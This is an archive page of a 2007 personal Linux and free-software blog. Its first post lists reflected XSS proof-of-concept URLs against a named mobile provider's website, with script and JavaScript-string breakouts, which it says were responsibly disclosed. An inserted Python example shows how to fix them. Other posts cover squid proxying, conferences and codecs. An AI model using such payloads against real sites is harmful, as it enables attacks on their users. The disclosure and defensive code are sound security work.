Monday, March 12. 2007
XSS on eplus.de
Note: This is just a short form of a German article I posted today. E-Plus is a big German mobile telephony provider. I've found a bunch of XSS issues together with Alexander Brachmann (responsible disclosure: all of them were reported to E-Plus beforehand, probably more to come).
For my English visitors, here are the URLs:
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script>
http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus.de/frame.asp?go=');alert('
Already fixed ones:
http://www.eplus.de/frame.asp?go=http://www.google.de/
http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de
http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com
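The URLs above show two separate problems: the suchwort parameter is reflected into an HTML attribute (the `"><script>` breakout), the go parameter of frame.asp is reflected into a JavaScript string literal (the `');alert(1);` breakout), and the "already fixed" list is a set of classic bypasses of a check that only looks at the beginning of the target URL (user-info trick, longer hostnames). The following is an added example by the editor, not E-Plus's code and not from the original post; the server-side template shape, the allowed host and the fallback URL are assumptions. It puts a naive prefix check and a naive document.write() template beside hardened versions that parse the URL properly and encode for both output contexts.

```python
"""Added example (editor's illustration, not E-Plus's code, not from the post).

Models the two problems the frame.asp URLs demonstrate:
  * the go parameter ends up inside a JavaScript string literal, so a "');"
    in the value breaks out of it (reflected XSS);
  * the "already fixed" URLs bypass a check that only inspects the start of
    the target URL (http://www.eplus.de@www.google.de, www.eplus.dedomain.com).
The exact template, the allowed host and the fallback URL are assumptions."""
import html
import json
from urllib.parse import urlsplit

ALLOWED_HOST = "www.eplus.de"  # assumption: frame.asp should only frame its own site


def naive_is_allowed(go: str) -> bool:
    """Prefix check: every 'already fixed' bypass URL on the page passes it."""
    return go.startswith("http://www.eplus.de")


def strict_is_allowed(go: str) -> bool:
    """Parse the URL and compare scheme and hostname exactly.
    urlsplit().hostname drops user:pass@ and :port, so
    http://www.eplus.de@www.google.de yields 'www.google.de'."""
    try:
        parts = urlsplit(go)
    except ValueError:
        return False
    return parts.scheme in ("http", "https") and parts.hostname == ALLOWED_HOST


def js_string_literal(value: str) -> str:
    """Encode for a JS string literal inside <script>: JSON supplies quoting and
    backslash escapes (ensure_ascii also covers U+2028/U+2029); '<', '>' and '&'
    are escaped too, so the literal can never contain '</script>'."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def encode_for_frame(go: str) -> str:
    """The value lands in an HTML attribute that itself sits inside a JS string,
    so encode the innermost context first: HTML attribute, then JS string."""
    return js_string_literal(html.escape(go, quote=True))


def naive_frame_script(go: str) -> str:
    """Vulnerable template: the parameter is dropped into the JS literal as-is."""
    return "<script>document.write('<frame src=\"" + go + "\">');</script>"


def safe_frame_script(go: str) -> str:
    """Hardened template: validate the target, then encode for both contexts."""
    if not strict_is_allowed(go):
        go = "http://" + ALLOWED_HOST + "/"  # assumption: fall back to the start page
    return ("<script>document.write('<frame src=\"' + "
            + encode_for_frame(go) + " + '\">');</script>")


if __name__ == "__main__":
    payloads = [
        "http://www.eplus.de/');alert(1);document.write('",
        "');alert('",
        "http://www.eplus.de@www.google.de",
        "http://www.eplus.de.mydomain.com",
    ]
    for p in payloads:
        print(f"{p!r:60} naive={naive_is_allowed(p)!s:5} strict={strict_is_allowed(p)}")
        print("   ", safe_frame_script(p))
```

Note that the hostname check alone still accepts the first payload (its host really is www.eplus.de, the breakout lives in the path), which is why target validation and output encoding are both needed: the check stops the open-frame bypasses, the encoding stops the script injection.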
Friday, March 9. 2007
Small things to help free software: Device IDs
Something people often ask in the free software world: I can't program, but I want to help out somewhere.
There's one thing that's very simple to do for everyone using Linux. We have two tools, lspci and lsusb, that look on the PCI/USB bus for installed devices. Each device has an ID consisting of a vendor ID and a product ID. Everyone can check their own hardware to see whether everything is detected. For lspci, first run update-pciids, then lspci -v. Each »Unknown« represents an ID that's not in pci.ids. Report the exact device model name through the interface at http://pciids.sourceforge.net/.
For lsusb, run update-usbids and attach all USB devices you can find. lsusb doesn't print »Unknown«; if there's only a vendor name after a device number, the product ID is unknown. The usb.ids database is much more incomplete than the PCI one. They don't have such a fancy interface as pciids; just send it to the current maintainer (listed in the file, usually at /usr/share/misc/usb.ids or /usr/share/usb.ids).
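The wording of lspci and lsusb for a missing entry differs between versions, so a more robust way to do the check above is to match the raw vendor:device pairs from lspci -n or lsusb against the ids file itself. The following is an added example, not from the original post: pci.ids and usb.ids share one layout (vendor lines in column 0, device lines indented by one tab), so a single parser serves both. The file paths and the tool invocations are assumptions about the host, and the sample data in the block is constructed.

```python
"""Added example, not from the original post: report PCI/USB IDs that are
missing from the local ids database by matching raw vendor:device pairs
against the pci.ids / usb.ids file instead of relying on lspci's/lsusb's
"Unknown" wording.  Paths are assumptions; sample data is constructed."""
import re
import subprocess
from typing import Dict, List, Set

# Vendor lines start in column 0 ("10de  NVIDIA Corporation"), device lines are
# indented by one tab.  Subsystem lines (two tabs) and class lines ("C 03 ...")
# deliberately match neither pattern.
_VENDOR_LINE = re.compile(r"^([0-9a-f]{4})  (.+)$")
_DEVICE_LINE = re.compile(r"^\t([0-9a-f]{4})  (.+)$")
_ID_PAIR = re.compile(r"\b([0-9a-f]{4}:[0-9a-f]{4})\b")


def parse_ids(text: str) -> Dict[str, Set[str]]:
    """Map vendor id -> set of device ids for a pci.ids/usb.ids style file."""
    known: Dict[str, Set[str]] = {}
    vendor = None
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        m = _VENDOR_LINE.match(line)
        if m:
            vendor = m.group(1)
            known.setdefault(vendor, set())
            continue
        m = _DEVICE_LINE.match(line)
        if m and vendor is not None:
            known[vendor].add(m.group(1))
    return known


def ids_from_output(tool_output: str) -> List[str]:
    """Pull vendor:device pairs out of `lspci -n` ("01:00.0 0300: 10de:0140 (rev a2)")
    or `lsusb` ("Bus 001 Device 002: ID 046d:c52b ...") output."""
    return _ID_PAIR.findall(tool_output.lower())


def missing_ids(known: Dict[str, Set[str]], pairs: List[str]) -> Dict[str, str]:
    """For each pair report 'vendor' if the vendor itself is unknown, or
    'device' if the vendor exists but this product id is missing."""
    result: Dict[str, str] = {}
    for pair in pairs:
        vendor, device = pair.split(":")
        if vendor not in known:
            result[pair] = "vendor"
        elif device not in known[vendor]:
            result[pair] = "device"
    return result


def find_unknown(ids_text: str, tool_output: str) -> Dict[str, str]:
    return missing_ids(parse_ids(ids_text), ids_from_output(tool_output))


# Constructed sample data (not the real databases, not a real machine).
SAMPLE_IDS = """\
# excerpt in pci.ids layout
10de  NVIDIA Corporation
\t0140  NV43 [GeForce 6600 GT]
8086  Intel Corporation
\t2415  82801AA AC'97 Audio Controller
\t\t8086 2415  subsystem line, ignored
C 03  Display controller
"""
SAMPLE_LSPCI_N = """\
01:00.0 0300: 10de:0140 (rev a2)
00:1f.5 0401: 8086:2415 (rev 02)
02:00.0 0200: 10de:beef
03:00.0 0c03: 1234:5678
"""

if __name__ == "__main__":
    print("sample:", find_unknown(SAMPLE_IDS, SAMPLE_LSPCI_N))
    # Live run; both file paths and the commands are assumptions about the host.
    for ids_path, cmd in (("/usr/share/misc/pci.ids", ["lspci", "-n"]),
                          ("/usr/share/misc/usb.ids", ["lsusb"])):
        try:
            with open(ids_path, encoding="utf-8", errors="replace") as f:
                ids_text = f.read()
            out = subprocess.run(cmd, capture_output=True, text=True, check=True).stdout
        except (OSError, subprocess.CalledProcessError) as e:
            print(f"{cmd[0]}: skipped ({e})")
            continue
        print(f"{cmd[0]}: missing from {ids_path}:", find_unknown(ids_text, out))
```

Run it after update-pciids/update-usbids so you're comparing against the freshest database; anything reported as "vendor" is worth sending in together with the device line, since the maintainers need the vendor name before they can file the product.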
Posted by Hanno Böck in Code, Computer culture, English, Gentoo, Linux at 00:23
Friday, March 2. 2007
More OpenStreetMapping
I've been actively participating in the OpenStreetMap project for about a week. Today I tagged two roads Google Maps doesn't know about (so at least in one very small part of the world OSM is more accurate than Google).
They're the Euro and D-Mark streets in Murrhardt. And yes, they invent stupid street names here.
Posted by Hanno Böck in Computer culture, Copyright, English at 01:23
Thursday, March 1. 2007
Early look at free nvidia driver

A group of people is currently working on a free nvidia driver; the project is called nouveau. I now had a chance to test the nouveau driver on an nvidia card (NV43). It doesn't do much at the moment, but at least it runs glxgears almost smoothly.
It's nice to see development on that front. We made a small video of glxgears running on nouveau. Oh, for all those who can't play Theora, I put it up on YouTube (but seriously, I was just curious how YouTube works and whether it accepts Theora).
Some experimental nouveau ebuilds, maintained by pq from the nouveau project, are here:
svn co https://svn.hboeck.de/nouveau-overlay
Monday, February 26. 2007
Short tip: Transparent local proxy with iptables and squid
I live in a dormitory where I get cheap and fast internet access, but HTTP only through a proxy. It's a pain to set this up in every app each time I come here and disable it again when I want to get online somewhere else, because there's no central place to do so (many apps simply ignore the http_proxy environment variable).
It wasn't possible to forward HTTP requests directly to the dormitory proxy with iptables alone: a DNAT only changes the destination address, while a normal (non-transparent) proxy expects proxy-style requests with an absolute URL, so this would require rewriting HTTP headers. Maybe it's possible with more iptables skills.
My solution was to set up a local squid, forward requests to it via iptables and configure the dormitory proxy as its parent. There's a lot of documentation out there, but also lots of outdated material (squid's configuration options have changed significantly) and material you won't understand unless you're a proxy guru.
Now, some lines in my squid.conf:
http_port 7777 transparent
visible_hostname 127.0.0.1
acl local src [myip]/255.255.255.255
http_access allow local
cache_peer proxy.mynetwork.com parent 3128 3130 proxy-only
The first line enables the options required for transparent HTTP and sets the port to 7777 (it can be anything, it just shouldn't collide with a service you run). visible_hostname is required; use something that resolves to localhost. The acl and http_access lines deny requests from any other host, and finally cache_peer sets the upstream proxy (replace proxy.mynetwork.com with whatever your network proxy is). Since squid sends everything to the parent on port 3128, its own connections aren't caught by the port-80 rule below; if squid ever went direct (parent down, for example), those connections would be redirected back into squid and loop.
Besides that, there's a line starting with hierarchy_stoplist (by default it matches cgi-bin and ?). It tells squid to fetch matching URLs directly instead of through the parent, which doesn't work here, so comment it out; otherwise URLs with GET parameters fail.
Now, for the iptables-part, it's pretty simple:
iptables -t nat -A OUTPUT -p tcp --dport 80 -j DNAT --to 127.0.0.1:7777
I've now added squid to my default runlevel; it doesn't take long to start. My network setup scripts contain the iptables line above for the dormitory, and squid is simply ignored elsewhere. One problem I haven't debugged enough to know the cause: sometimes it seems unable to deliver POST variables, e.g. the function search on php.net doesn't work.
For your info, my system is Gentoo Linux with squid 2.6.9, iptables 1.3.7 and kernel 2.6.20.
Tales from an admin's day
We got hit by a huge trackback spam DDoS over the last few days, which made our servers unavailable for some hours. Most probably caused by a botnet. That's really a pain; you're so defenseless against that kind of threat. Filtering them is like trying to keep ants out of your house by closing their entrance holes.
Anyway, I decided to write some abuse mails to the contacts of some of the source IPs. I even got ONE reply (from Neighbourhood Cable; if you're looking for an ISP in Australia, have a look at them, they must be good). I also got this:
<k55k559@bora.net|/webmail/mbox5/bora.net/961/k55k559|2|204800|209715200|99999999|99999999|>:
Recipient's maiilbox is full, message returned to sender, (#5.2.2) allot:(209715200), usage:(209874944)
<saehym@bora.net|/webmail/mbox0/bora.net/865/saehym|2|51200|58454016|99999999|99999999|>:
Recipient's maiilbox is full, message returned to sender, (#5.2.2) allot:(52428800), usage:(58474496)
Now, who in the world hands out IPs to people who aren't able to configure their mailboxes? Boranet, the source of that, seems to belong to the company LG, which also produces hardware. Maybe an interesting fact when you buy your next CD burner.
Sunday, February 11. 2007
Best viewed with any browser?
Now, if you've been on the internet a bit longer, you may remember those sites at the end of the 90s telling you that they're »best viewed with a resolution of 1024x768 and Microsoft Internet Explorer version 6.0«. Luckily, most of those pages disappeared with the rising success of Mozilla Firefox and others (oh, there are still some, e.g. the cinema in my home town, but IE6 runs in Wine).
As you may know, I'm a happy KDE user and have been using Konqueror as my everyday browser for some time now. Recently I've discovered more and more pages I can't use any more; I had to start this thing called Firefox. I don't like it, but that's not the point here.
I even noticed today that eBay has a new interface that Konqueror doesn't like.
This is a result of the increasingly common AJAX/JavaScript stuff, which is often nice; I've seen a lot of well designed web applications lately (ok, I saw a lot of crap, too). I'm not enough into JavaScript to know whether it's Konqueror's lack of support or the pages. I just hope people will come together and find solutions for that. I remember there was some discussion about using WebCore (the khtml fork used by Apple's Safari) for Konqueror; I don't know if that would make it better, maybe some users of this DRM-crippled system could comment on that.
Posted by Hanno Böck in Code, English, Gentoo, Linux, Webdesign at 00:42
Sunday, January 28. 2007
More fancy desktops: Metisse

As you may already have expected, I couldn't wait to create some ebuilds, so fetch my overlay (which is still called xgl, but don't mind that) for fancy X stuff and run emerge metisse:
svn co https://svn.hboeck.de/xgl-overlay
At the moment it requires its own X server (very much like Luminocity or Xgl in the past); the window and composite manager is a modified variant of fvwm. After installing, run Xmetisse :1 on one console and metisse-start-fvwm -wd :1 on another. You'll get a fancy new desktop inside a window.
At the moment it looks very much like a design study, not really intuitive to use, but it has some interesting approaches. Nice to see that the Linux desktop is evolving. For all non-Gentooers, Mandriva has a live CD for you.
Tuesday, January 16. 2007
Fluendo retracing the steps of Novell
Fluendo, a company working on GStreamer, recently announced the availability of commercial, binary codecs for some multimedia formats. They list WMA, WMV, MMS, MPEG-2, MPEG-4, ASF and MP3.
Now, this raises some interesting questions for me: pretty much all those codecs are already well supported by free implementations, ffmpeg and others. The only exception I can see is WMA3, which is still unsupported by free alternatives but rarely used. Even the latest Windows Media Video, based on VC-1, has recently gained support in ffmpeg. So from a technical viewpoint the codecs are of very low importance.
The point they don't mention in their press release is probably: we provide you with commercial codecs and save you from patent threats. That raises the question of software patents. For Europe it's very doubtful whether the covered patents are valid at all; as we know, the EU rejected the »legalization« of software patents back in 2005, keeping the uncertain situation we had before.
In strategic terms for the free software community, this case is probably similar to the Novell-Microsoft deal, and raises the same problems Bruce Perens pointed out in his open letter: if there's a »licensed« way to use MPEG and other patented formats on Linux, this might weaken the position of projects fighting software patent threats against free software.
So, if you think software patents should be abandoned (which every free software developer should), raise your voice against questionable patent agreements with companies earning their money from software patents.
Saturday, January 6. 2007
Updates on compiz in Gentoo (now with kde-decorator)

compiz-start tries to autodetect a running KDE and then runs the kde-window-decorator. If compiz-start fails for you, please report it, because I plan to deprecate all the compiz-aiglx/xgl/nvidia scripts.
Besides that, we now have compiz-settings in the tree, a simple configuration tool for compiz that saves you from using gconf manually.
Friday, December 29. 2006
23C3 - day 2 and 3
My favorite talk yesterday was given by Werner Pieper and was mainly a collection of anecdotes about his time as a former drug dealer. He presented some interesting thoughts and experiences about trust in the illegal world. He also had some interesting stories about piracy prints.
Today I watched a talk about TPM and MacOS, which led to a very angry reply at the end by Rüdiger Weiss (who did a lot of work and gave interesting talks about trusted computing in past years); sadly there wasn't any time left. Also about DRM: later in the day there was a sadly very sparsely attended talk by Seth Schoen from the EFF about television standards and the DRM discussion in the DVB group (DVB is the European digital video standard). Very detailed information, and many things I didn't know, for example that the industry plans to implement devices that only work in certain areas (via GPS modules) or in a specific household. Most people seemed to have attended the talk by their »popstar« (Lawrence Lessig), which was placed in the same time slot.
Besides that, I sat for some time at the CAcert booth, helping them assure visitors. Had some nice talks there and got the feeling that CAcert is really moving forward these days. For example, I didn't know until now that Indymedia uses CAcert for their open posting.
Besides that, some people asked me about my desktop background; it's from an anti-DRM/iTunes campaign by the Free Software Foundation, and you can find it here.
Posted by Hanno Böck in Computer culture, Copyright, English, Gentoo, Life, Movies at 23:45
Thursday, December 28. 2006
23C3 - report first day
Still here at the 23C3; I'll try to summarize some things about the talks I visited yesterday.
First was a presentation about the trust model of GPG/PGP and an alternative approach. I wasn't so impressed, because I think the main shortcoming of the web-of-trust infrastructure is that it's too complex for the masses to understand.
The lightning talks were quite nice; some guy presented some live hacks against a poorly designed travel agency, which was very funny. I personally presented compiz and said a few short things about the situation of 3D graphics and desktops.
I saw about the last 10 minutes of a talk about drones, small camera-equipped devices flying around, and thoughts on what these devices could mean for society. A group is working on building such devices at quite low cost. I'll have to watch that fully on video after the congress.
Another very interesting talk: »The gift of sharing«; the speaker presented thoughts on what kind of »economy structure« free software development should be called. It was a bit difficult to follow the talk, as it was in English and I'm no native English speaker. There's a paper by him which is probably worth reading.
The last talk was about wiki knowledge and citing it in science. The speakers plan to create an RFC for citing URLs in wikis.
What irritated me was a computer science professor saying that she wouldn't allow her students to cite wikis, with the stupid argument that they should cite their sources from books, completely ignoring that science can happen in wikis and that a wiki may be the original source of the knowledge, not just something that has been explored elsewhere. Rüdiger Weiss gave good arguments against that and mentioned that he thinks wikis are really a new way of doing science and should be treated as such.
To be continued.
Posted by Hanno Böck in Computer culture, English, Gentoo, Linux, Politics, Science at 16:41
Sunday, November 26. 2006
Google vs. gaia
Google has the reputation of being free-software-friendly. Without doubt they've done a lot in the past, especially the many Summer of Code projects that developed essential features for free software projects.
That Google is also willing to put legal pressure on free software projects if they compete in its area, they recently showed against the project gaia. It was a project to build a replacement client for Google Earth (Google's own client is proprietary), done by pure reverse engineering. The author took the project down after he received a letter from Google.
It's quite questionable whether gaia was doing anything illegal. They didn't use any data from Google; they just provided another client for the service. In my opinion it's very important to fight for the right to reverse engineer. Many essential free software projects wouldn't exist if we couldn't reverse engineer. Just think of many hardware drivers, filesystem support, Samba, many multimedia codecs, support for proprietary document formats (e.g. .doc in OOo) and lots more.
By the way, I took the liberty of hosting a copy of the latest gaia version (and, as requested in some comments, the win32 patch for gaia). It's GPL, so everyone is free to continue the development.
Posted by Hanno Böck in Computer culture, Copyright, English, Gentoo, Linux at 14:22
Tuesday, November 7. 2006
IPv6 where are you?
Recently various news sites were writing about the nearing breakthrough of IPv6 (e.g. the German news site Golem: IPv6 steht vor dem Durchbruch).
As an associate of a small and innovative provider, I can't see this breakthrough. It seems nearly impossible to find hosting for dedicated servers that offers native IPv6 (at least with reasonable hardware/price conditions). Yes, I know I can tunnel through SixXS or other tunnel brokers, but I don't want low-speed IPv6 for people who can wait; I want to support IPv6 with the same quality and speed as normal IPv4.
If you're working on the small side (dedicated servers, no colocation), you're out of luck twice. You hardly find providers that give you more than a few IPv4 addresses, and you can hardly do anything to push the next-gen IPv6 forward.
Friday, October 20. 2006
Why you don't want winmodems
My laptop has an internal modem I rarely use. Currently it's one of those moments. It is a so-called winmodem, which is no real modem but just a sound device with a split driver: an in-kernel ALSA one (free) and a proprietary daemon emulating a modem.
I wondered why some tasks that have nothing to do with the network were slow as hell. Now, I knew that it just emulates, but I never thought of that:
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
30458 root RT -6 4384 4384 3588 S 17.3 0.9 8:37.33 slmodemd
Posted by Hanno Böck in Computer culture, English, Gentoo, Linux at 00:02